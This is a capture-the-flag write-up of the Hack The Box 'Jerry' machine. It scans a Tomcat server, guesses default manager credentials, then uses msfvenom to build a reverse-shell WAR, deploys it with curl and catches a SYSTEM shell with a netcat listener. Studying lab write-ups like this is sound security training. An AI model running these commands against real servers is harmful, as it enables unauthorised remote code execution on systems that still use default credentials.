# HTB | [Jerry](https://app.hackthebox.com/machines/144)

**Author**: Nanonej

**Status:** [Rooted]

**Tags:** #Windows #Web #ArbitraryFileUpload #FileMisconfiguration #Apache #Tomcat #WeakCredentials

**Vulnerabilities:** Weak credentials.
+ Security misconfigurations
+ Arbitrary file upload
+ Remote code execution

**Rating:** Easy

## Overview

Although Jerry is one of the easier machines on Hack The Box, it is realistic as Apache Tomcat is
often found exposed and configured with common or weak credentials.

---

## Reconnaissance

Let's check the web page during NMAP scan. \
Can't access on default port, looking the scan the right one seem 8080. \
We are welcomed by a `Apache Tomcat/7.0.88` default page.

### NMAP
```console
$ nmap -sC -A -Pn -oA jerry.nmap 10.10.10.95
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-23 14:52 EST
Nmap scan report for 10.10.10.95
Host is up (0.038s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.64 seconds
```

Just a webserver running on Apache. \
Let's check if vulnerabilities exist for those versions. \
No obvious CVE exploits found.

Let's try accessing `/manager/html` with basic credentials combinations, succes with `admin:admin` but '403 Forbidden' response. \
Let's check OS version in `/manager/status` : `Windows Server 2012 R2` we also got the Hostname `JERRY`. \
Again let's check for vuln for the OS version. Nothing. \
Let's make a safe script scan with nmap. Nothing. \
Let's try login again on `/manager/html` with basic credentials script `auxiliary/scanner/http/tomcat_mgr_login`. SUCCESS `tomcat:s3cret` !

## Vulnerability Analysis

If you have access to the Tomcat Web Application Manager, you can upload and deploy a .war file (execute code).

## Exploitation

```console
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST={tun0} LPORT=80 -f war -o revshell.war
$ curl --upload-file revshell.war -u 'tomcat:s3cret' "http://10.10.10.95:8080/manager/text/deploy?path=/revshell"
$ nc -lvnp 80
```
http://10.10.10.95:8080/revshell/

```console
C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system
```

PWND!

### Flags

Can be found in `"C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt"`.

### Cleanup

```console
$ curl "http://tomcat:s3cret@10.10.10.95:8080/manager/text/undeploy?path=/revshell"
```

## Conclusion

Change default password for secured ones !

---

## References

- https://book.hacktricks.xyz/pentesting/pentesting-web/tomcat
